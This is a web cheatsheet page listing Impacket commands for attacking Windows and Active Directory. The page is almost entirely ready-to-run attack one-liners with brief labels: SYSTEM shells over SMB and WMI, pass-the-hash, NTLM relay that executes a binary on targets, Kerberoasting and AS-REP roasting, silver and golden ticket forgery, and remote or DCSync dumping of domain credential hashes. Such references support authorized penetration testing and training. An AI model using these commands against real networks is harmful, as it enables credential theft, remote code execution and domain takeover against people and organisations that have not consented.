← All Cheatsheets

active-directory

Impacket — Windows & Active Directory Attacks

Impacket Python library with tools for SMB, MSRPC, Kerberos, NTLM, WMI, and AD attacks.

21 views Apr 2026 lazyhackers

Authentication & Relay (9)

impacket-psexec domain/user:[email protected]

PSExec — get SYSTEM shell via SMB

psexec smb rce

impacket-psexec domain/[email protected] -hashes :NTLMhash

PSExec with pass-the-hash

psexec pth hash

impacket-smbexec domain/user:[email protected]

SMBExec — alternative to PSExec (no file drop)

smbexec smb

impacket-wmiexec domain/user:[email protected]

WMIExec — code exec via WMI (no service)

wmiexec wmi

impacket-wmiexec domain/[email protected] -hashes :NTLMhash

WMIExec pass-the-hash

wmiexec pth

impacket-ntlmrelayx -tf targets.txt -smb2support

NTLM relay attack to target list

ntlmrelayx relay smb

impacket-ntlmrelayx -tf targets.txt -smb2support -i

NTLM relay — interactive SMB shell

ntlmrelayx relay shell

impacket-ntlmrelayx -tf targets.txt -smb2support -e shell.exe

NTLM relay — execute binary on target

ntlmrelayx relay rce

impacket-ntlmrelayx -t ldap://DC01 --escalate-user compromised_user

Relay to LDAP for privilege escalation

ntlmrelayx ldap privesc

Kerberos Attacks (6)

impacket-GetUserSPNs domain.local/user:password -dc-ip 10.10.10.1 -request

Kerberoasting — dump TGS hashes for SPNs

kerberoast kerberos spn

impacket-GetNPUsers domain.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.1

AS-REP Roasting — users with no pre-auth

asrep kerberos roasting

impacket-GetNPUsers domain.local/ -no-pass -dc-ip 10.10.10.1

AS-REP Roast all domain users (anonymous)

asrep kerberos

impacket-ticketer -nthash NTLMhash -domain-sid S-1-5-21-xxx -domain domain.local -spn cifs/server.domain.local user

Forge Silver Ticket for service

silver-ticket kerberos forge

impacket-ticketer -nthash krbtgt_hash -domain-sid S-1-5-21-xxx -domain domain.local administrator

Forge Golden Ticket (krbtgt hash needed)

golden-ticket kerberos forge

export KRB5CCNAME=/tmp/ticket.ccache && impacket-psexec -k -no-pass domain.local/user@server

Pass-the-Ticket: use .ccache for auth

ptt kerberos ticket

Credential Dumping (4)

impacket-secretsdump domain/user:[email protected]

Dump SAM, LSA, cached creds remotely

secretsdump creds dump

impacket-secretsdump domain/[email protected] -hashes :NTLMhash

secretsdump with pass-the-hash

secretsdump pth

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL

Offline NTDS.dit dump (local files)

secretsdump ntds offline

impacket-secretsdump domain/admin@DC01 -just-dc-ntlm

DCSync — dump all domain hashes (DA needed)

dcsync ntlm da

Enumeration & SMB (7)

impacket-smbclient domain/user:[email protected]

Interactive SMB client

smb enum

impacket-smbclient domain/[email protected] -hashes :NTLMhash

SMB client with hash

smb pth

impacket-lookupsid domain/user:[email protected]

Enumerate users/groups via SID bruteforce

enum sid users

impacket-rpcdump domain/user:[email protected]

Dump RPC endpoints

rpc enum

impacket-reg domain/user:[email protected] query -keyName "HKLM\SAM"

Remote registry query

registry enum

impacket-mssqlclient domain/user:[email protected]

MSSQL interactive client

mssql database

impacket-mssqlclient domain/user:[email protected] -windows-auth

MSSQL with Windows auth

mssql windows-auth